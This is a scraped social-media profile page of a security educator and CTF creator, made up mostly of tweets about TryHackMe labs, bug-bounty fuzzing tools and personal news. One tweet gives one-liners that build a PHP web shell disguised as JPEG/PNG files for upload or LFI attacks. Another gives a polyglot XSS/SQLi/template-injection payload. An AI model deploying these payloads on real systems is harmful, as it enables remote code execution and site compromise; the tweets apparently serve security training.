Adam Langley
@BuildHackSecure
Followers
8,569
Following
733
Media
574
Statuses
5,294
Fullstack dev & Hacker, training ethical hackers how to hack & web devs to secure their apps! CTO @hackinghub_io , Director @bsidesexeter & Founder @beDevSecure
Exeter, England
Joined February 2015
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Haitian
• 593459 Tweets
Springfield
• 427110 Tweets
Labour
• 373783 Tweets
Yunes
• 242065 Tweets
Argentina
• 225648 Tweets
Colombia
• 203286 Tweets
Morena
• 202474 Tweets
PS5 Pro
• 188817 Tweets
Senado
• 181133 Tweets
PlayStation
• 144481 Tweets
Anna
• 134947 Tweets
Sony
• 134683 Tweets
England
• 117094 Tweets
CONGRATULATIONS BTS
• 88669 Tweets
Nintendo
• 74282 Tweets
Tony
• 73586 Tweets
#الكويت_العراق
• 64390 Tweets
バーレーン
• 51105 Tweets
Swalwell
• 50858 Tweets
Marko Cortés
• 26676 Tweets
#TemptationIsland
• 26417 Tweets
Finland
• 23330 Tweets
Trent
• 22878 Tweets
Lola
• 22589 Tweets
Barranquilla
• 20277 Tweets
Fang Fang
• 16938 Tweets
اليابان
• 16887 Tweets
Dave Grohl
• 16393 Tweets
Bernstein
• 15572 Tweets
Harry Kane
• 15265 Tweets
Adult Content
• 15223 Tweets
#KohLanta
• 14392 Tweets
Alfred
• 11673 Tweets
De Ligt
• 10946 Tweets
#NEDGER
• 10261 Tweets
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload.
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
#bugbountytip
#ctf
#hacking
26
150
571
I made a tool to generate Sec/Dictionary files for content discovery by scrapping GitHub for File/Folder Names and GET/POST & HTTP from PHP files. So far its examined 5,256,950 files from 39069 repositories, check the results
#BugBounty
#bugbountytips
11
213
530
If you’ve enjoyed my CTFs and haven’t yet tried my other challenges please take a look at (
@CTFchallenge
) . There’s currently 9 challenges with 64 flags to find. Each challenge is built like a full size business full of real world vulnerabilities.
9
111
378
Really happy to announce I'm going to be joining the team
@RealTryHackMe
as their new content engineer. I'm going to be bringing my own brand of evil for their challenges!
Got some really exciting news today that I'm looking forward to sharing hopefully later this week!
1
0
13
49
11
343
Continuing my ♥️ for ffuf I've created for the community, you can learn ffuf on a live target with different lessons. It's open-sourced at so you can also run it locally in docker. Would ♥️ to get feedback
#bugbountytips
#infosec
13
103
322
<?php
if( date(“d”) === ‘26’ && date(“m”) === ‘04’ ){
$age++;
}
?>
39
4
295
The network simulator I built for
@RealTryHackMe
has been by far one of the most advanced frontend projects I’ve taken on. You can lay the network out however you want in a grid system, with switches connecting computers together and routers connecting networks together.. 1/2
15
28
280
One of the best words to describe is realistic. Realistic websites, realistic businesses, realistic vulnerabilities and realistic infrastructure. Come and try your skills against my challenges, great for red team, pen testers, bounty hunters and CTFers :)
4
48
245
Awesome first day
@RealTryHackMe
getting to know the team, awesome people and awesome vision. Also came back to a
@Hacker0x01
swag box ( thank you
@NahamSec
) . My youngest has stolen the cap already!
6
6
225
My sons learning python and I don’t know that much of it so we’ve created a shop scenario that we’ve got to make a program for. Love that he’s started a passion for programming all by himself
#proud
8
2
218
Great tool is for .DS_Store files which are often accidentally included in git repositories from Mac devs. These files can be parsed revealing a list of files in the directory. Those files could include passwords, keys etc.
#BugBountyTip
#infosec
#hacking
2
79
217
I was today years old when I learnt you could pipe lists into ffuf instead of just specifying a file. For example, if you wanted to test a bunch of id numbers against an endpoint ( think IDOR ) then you could do "seq 1 - 1000 | ffuf -w - -u "
#bugbountytips
7
55
208
If you come across a Wordpress install try “/wp-content/themes/[custom-theme-name]/.git” . Even if directory listing is disabled you can rebuild and clone it with tools like which allow you to view source code
#BugBountyTip
#bugbounty
#infosec
1
94
191
Ultimate payload:
{{ 7 * “><script src=“
http://169.254.169.254/payload.dtd”>alert(“
‘ and 1=1;—”)</script>}}
#bugbountytips
#bugbountytip
8
30
170
Your webapp goes down, you ssh in, what’s the first command you’re running?
106
6
147
Next week is my last week at TryHackMe. I’m really proud of the content I’ve created and it was an absolute pleasure working with the whole THM team and community. A special thanks to Ben and Ashu for the opportunity!
13
1
140
<?php
$birthday = true;
$age = 37;
if( $birthday ){
$age++;
}
30
4
135
13
7
139
Just updated!!!
I've scanned over 175k public GitHub repos and around 35 million files to create a bunch of useful web app fuzzing lists.
#infosec
#bugbountytips
#cybersecurity
3
34
137
I'm in!!!!
Damn, trying to get an LFR working, in PHP file_get_contents() accepts incorrect directories with a travesal i.e "/etc/fake_dir/../passwd" but file_exists() doesnt!!!! so close!
1
0
18
5
11
137
Got a spare hour this weekend and want to learn about sql injection ranging from basic to advanced? Then check out the video I made this week
#bugbountytips
#hacking
#infosec
2
40
132
If you’re new to security or even if your not and feel like you missed out on some fundamentals of how the web works then I’d massively suggest these
@RealTryHackMe
rooms , and
2
35
123
Can’t believe my little side project has had over 4000 signups! Thanks for the boost yesterday
@stokfredrik
and everyone else who has supported it!
Wow, has now had over 4000 signups. Thanks to everyone who has joined!
0
14
70
3
15
119
Wow, can't believe I've passed 5000 signups today! Thanks to everyone who's given a try.
3
19
108
The has now been released for the
@RealTryHackMe
Pre-Security pathway. We've been working hard on this one with great content and labs. If you want to learn some networking or brush up on the stuff you might have learnt years ago this is a perfect way.
10
19
112
Do you think you could last a whole week in a terminal only?
55
7
108
This is the new module I’ve been working on for the last few months 😊
🚨New module: Introduction to Web Hacking!
Beginner-friendly interactive labs that will teach you the basics
🟢 Discovering website vulnerabilities
🟢 Exploiting common flaws
🟢 Remediating these vulnerabilities
Includes 3 FREE rooms to get you started!
8
41
255
3
14
105
Very proud to be part of this and the amazing team at
@RealTryHackMe
I get the pleasure of working with.
We've released a NEW learning path: Jr Penetration Tester. Preparing for a career in cyber? Start here!
To celebrate we're giving away $7k worth of prizes
Complete rooms in the path & win tickets, get 3 of the same to redeem a prize 🎟️
Ends in 7 days
19
155
709
6
6
105
I’ve got a new room out on
@RealTryHackMe
which introduces people to authentication bypass methods and logic flaws, check it out
1
9
101
It took me about 20 years of going between security, development, networking and telecoms to finally find my niche, really glad I got into build security labs where I get to use all of my skill set and enjoy everyday of my work.
4
2
94
Imposter syndrome, self-doubt and a whole lot of negative stuff are kicking my ass right now. Gonna do the British thing and make a cup of tea.
13
0
99
Just finished my last two rooms for
@RealTryHackMe
, it's been a blast! Loved working with everyone there! Thank you ❤️
4
1
95
10 years ago today was the last time I saw my eldest brother, it was also the day he took his own life. No one knew how he was feeling, he kept it all to himself. Please if you ever feel like this then reach out to someone, DM’s are always open for anyone to chat ❤️
#mentalhealth
9
4
87
Well, it's now official I'm building a CTF or two for
@Hacker0x01
's
#hacktivitycon
. I've got some good ideas flowing already :)
5
2
85
If I went back 23 years and told the 14-year-old me that one day I'd be building a vulnerable forum for Christmas elves I'd probably be very confused 😂
9
2
83
I’ve got another challenge coming out on
@RealTryHackMe
in just over an hour :) Keep on eye on the new rooms feed on the dashboard or wait for the announcement on Discord
4
11
82
After years of working together I finally got to meet by buddy
@NahamSec
in real life. I look knackered from being awake for 24 hours 😂
3
2
82
Been working on a self hosted BXSS tool. In burp it understands context and returns the correct payload. Each field gets a custom subdomain for tracking and the parameters are also stored in a database. Once activated it will scrape URL, DOM and cookies, and alert on Discord.
6
11
78
Awesome!!!! 2000 users! Thanks to everyone who’s signed up for , I can’t quite believe it’s got this far 🙏
5
13
79
9 years ago I received the most devastating news I've ever had in my life, my Brother Neil had taken his own life at age 38. We had no idea and had no signs this would happen. Make sure to check in on your loved ones, the world can be a very lonely place at the moment.
4
3
73
If you’ve just got into recon and content discovery ffuf is a great tool! I built which gives lessons on how to use it against a live practice target or you can also run your own version via docker
#bugbountytips
1
18
72
@samwcyo
Also, create a web script which if anything other than your IP connects to just hangs for 100 seconds and then request the hell out of that script 😂
3
0
73
Are you a web developer who'd like to learn more or transition into security? I'm giving away a voucher for mine and
@NahamSec
Bug Bounty Course worth $80 which will teach you all you need to know about web app security.
Just like & retweet to enter.
10
52
73
My latest room for
@RealTryHackMe
. This room sets the groundwork for the new Junior Pentesters Pathway Web Module I'm working on. And covers how to assess and walk a website/web application with an intro to developer tools
2
6
73
I did a video with
@stokfredrik
all about CTFs :) Hope you enjoy it :)
ARE CTF CREATORS EVIL?! - A 1 Hour Conversation around realworld CTF's with Adam Langley.
What is a CTF?
How do you create one out of a realworld / Bug Bounty perspective?
And are all CTF Creators sadistic and evil?
#podcast
#CyberSecurity
11
17
111
5
8
70
I've uploaded my recent stream to YouTube: .If you're a fan of Web App Security, CTFs or developing CTFs you'll hopefully enjoy it. It contains OSINT, Recon, subdomain takeover, XXE, Source Code Review, SQLi and Exfil via ICMP.
0
23
71
It’s a work in progress but I’ve finally got my own office room in my new house!
9
0
68
I swear the hardest part of creating a CTF is developing a theme/storyline and not some of the bonkers engineering that goes on behind the scenes.
4
3
68
Two weeks ago I released my gitscraper tool which harvested POST, GET vars, HTTP headers, laravel routes and folder and file names. The cleaned directory been updated with the results of 11,085,399 PHP files from 73155 repos
#bugbountytips
#infosec
0
32
65
Representing
@RealTryHackMe
at the very wet and boggy
@parkrunUK
this morning :) got a new P.B as well :)
2
0
64
Tommorow I set off for
@defcon
, I've wanted to do this since I was 16 ( 23 years ago 😭 ), better late than never!
8
2
67
Working on an awesome intro to XSS room for
@RealTryHackMe
, some cool engineering has gone into the VM for this one :)
4
0
62
Mine is df -h
Over the years I’ve had it a few times where a process out of nowhere goes crazy and fills up the hard drive ( looking at your MySQL ) and that’s why nothing is working.
12
0
66
Awesome,
@ctfchallenge
has just passed 8000 sign-ups! Can't wait to start adding loads of new content and make this 10000+
3
4
60
Here is the solution for my "I once was blind but now I RFC" CTF for
@Hacker0x01
#hacktivitycon2020
4
16
61
Fucking JavaScript starting months at zero! Just wasted half an hour!
3
2
55
Can’t believe is nearly at 15000 signups!!! I built it for hackers to have realistic targets to hack against with real world vulnerabilities as I didn’t see anywhere else doing the same. Looking forward to pushing some awesome updates and content soon!
1
12
59
Another one of my Junior Pen-testers Web Modules has just dropped on
@RealTryHackMe
which teaches you all about SSRF
2
1
56
Can’t believe I’ve had 3000 signups! Thanks everyone!
Wow 3000 signups!!! Thank you to everyone who’s given a try! New features, lessons and challenges coming soon!
1
4
35
4
4
58
I'm doing my first live stream!!! Tune in @ on 29th June from 20:00 GMT where I'll be going through not only the solution to my latest CTF but also challenge development, potential pitfalls, keeping things running smoothly and any other questions.
4
18
56
Going of
@securinti
's awesome NahamCon talk and seeing that emails such as (":<script></script>"
@somedomain
.com) are actually RFC 822 compliant and some sites may allow you to sign up with that. There is an awesome builtin tool in python... 1/3
#bugbountytips
#infosec
1
21
56
If your interested in honing your
#bugbounty
skills and up for a challenge try some web app CTF
#hacking
challenges I’ve made at there’s XSS , IDOR , injection , content discovery, enumeration, brute force and much more.
1
20
55
Much like everyone, 2020 has been a scary and uncertain year in our household. I'm writing this tweet to call out some very important people who've either helped financially through work, friendship or both. Firstly
@nahamsec
and
@hacker0x01
for believing in me to deliver (1/4)
3
3
56
Woke up to see 5 people have solved the
@Hacker0x01
#h12006
CTF! Really awesome work
@_superhero1
@mcipekci
@S1r1u5_
@0xCaptainFreak
and also one other mystery hacker! Really excited to read your write ups! Well done, now get some sleep!!!
0
2
53
Can I ask my U.K security followers to please please please retweet this, we're putting on our first BSides in Exeter in July this year and it's going to be great. Tickets and details are available here
6
45
53
@h4x0r_dz
Have you given a try, I’ve tried to make it as close to bugbounty and web app hacking as possible.
1
7
52
Happy new year 🥳 and hello to any new followers. If your into web app security check out my project it contains a realistic hacking challenges made out like real targets. If your new don’t worry there’s a walkthrough and also a dojo to learn new skills!
1
17
51
Code review time... Can anyone find a security issue with the below code? It should stop requests being sent to any non trusted[.]com subdomains.
Share for fun.
8
9
49
If your looking for a new challenge then
@RealTryHackMe
are hiring for another content engineer. The job is remote and the team are amazing check out the link for more details
1
13
49
2021 was a hard year, the worst year of my life to be honest, with the support of family and friends, I kept going. Some of these challenges will continue into the next year but I'll face them head-on. Love to everyone in the New Year, treat each other well and keep on hacking ❤️
4
0
44
Thanks for my new and existing followers. Just a reminder that if anyone wants to sharpen their web app hacking skills then head over to (
@CTFchallenge
)
2
7
48
Merry Christmas / Happy Holidays / Have a good day Hackers!
2
0
48
If you have an IDOR between 2 user accounts you've created but have "NO WAY" of enumerating other UUID's do you still report it? Would it just get a lower severitiy due to low impact?
21
3
46
The very talented
@TomNomNom
, it was nice to speak to another northerner for a few minutes 😂
1
0
46
Tweeting this for accountability, which I'll update every week.
2022 plans:
1) Prioritise health and exercise above everything, no excuses.
2) 30+ Vids on YouTube
3) Relight my passion for hacking
3) Learn More
4) Get above 5k MRR
5) Earn 10k on BB
3
2
44
This is my life steam of developing a CTF from scratch, this is an IDOR which pivots to a blind XSS to retrieve a login cookie
2
9
41